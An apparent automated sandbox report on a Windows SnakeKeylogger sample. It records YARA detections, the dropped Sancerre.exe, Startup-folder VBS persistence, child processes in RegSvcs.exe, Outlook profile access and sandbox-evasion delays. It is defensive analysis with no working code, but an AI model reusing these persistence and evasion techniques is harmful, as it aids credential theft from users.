                  Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC37B5 GetLastError,FormatMessageW,0_2_00DC37B5
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB10BF AdjustTokenPrivileges,CloseHandle,0_2_00DB10BF
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00DB16C3
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005D10BF AdjustTokenPrivileges,CloseHandle,1_2_005D10BF
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005D16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_005D16C3
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00DC51CD
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DDA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00DDA67C
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00DC648E
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D542A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00D542A2
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeFile created: C:\Users\user\AppData\Local\konkedJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeFile created: C:\Users\user\AppData\Local\Temp\autE6FE.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs"
                  Source: AHSlIDftf1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: AHSlIDftf1.exeVirustotal: Detection: 70%
                  Source: AHSlIDftf1.exeReversingLabs: Detection: 73%
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeFile read: C:\Users\user\Desktop\AHSlIDftf1.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\AHSlIDftf1.exe "C:\Users\user\Desktop\AHSlIDftf1.exe"
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeProcess created: C:\Users\user\AppData\Local\konked\Sancerre.exe "C:\Users\user\Desktop\AHSlIDftf1.exe"
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\AHSlIDftf1.exe"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\konked\Sancerre.exe "C:\Users\user\AppData\Local\konked\Sancerre.exe"
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\konked\Sancerre.exe"
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: wsock32.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: AHSlIDftf1.exe | Static file information: File size 1109504 > 1048576
                  Source: AHSlIDftf1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: AHSlIDftf1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: AHSlIDftf1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: AHSlIDftf1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: AHSlIDftf1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: AHSlIDftf1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: AHSlIDftf1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP | source: Sancerre.exe, 00000001.00000003.1764694364.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000001.00000003.1765322342.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1917758127.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1918092494.0000000003D10000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb | source: Sancerre.exe, 00000001.00000003.1764694364.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000001.00000003.1765322342.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1917758127.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1918092494.0000000003D10000.00000004.00001000.00020000.00000000.sdmp
                  Source: AHSlIDftf1.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: AHSlIDftf1.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: AHSlIDftf1.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: AHSlIDftf1.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: AHSlIDftf1.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00D542DE
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D70A76 push ecx; ret 0_2_00D70A89
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_00590A76 push ecx; ret 1_2_00590A89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00CE02DD push ebx; retf 2_2_00CE02DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01239C30 push esp; retf 0127h 8_2_01239D55
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06939233 push es; ret 8_2_06939244
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | File created: C:\Users\user\AppData\Local\konked\Sancerre.exe

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D6F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00D6F98E
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DE1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00DE1C41
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_0058F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_0058F98E
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_00601C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_00601C41
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | API/Special instruction interceptor: Address: 107AF0C
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | API/Special instruction interceptor: Address: 1744284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599517
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599391
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599171
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599062
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598366
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598196
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598081
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595351
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595014
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594579
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594454
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594329
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594204
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594079
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599765
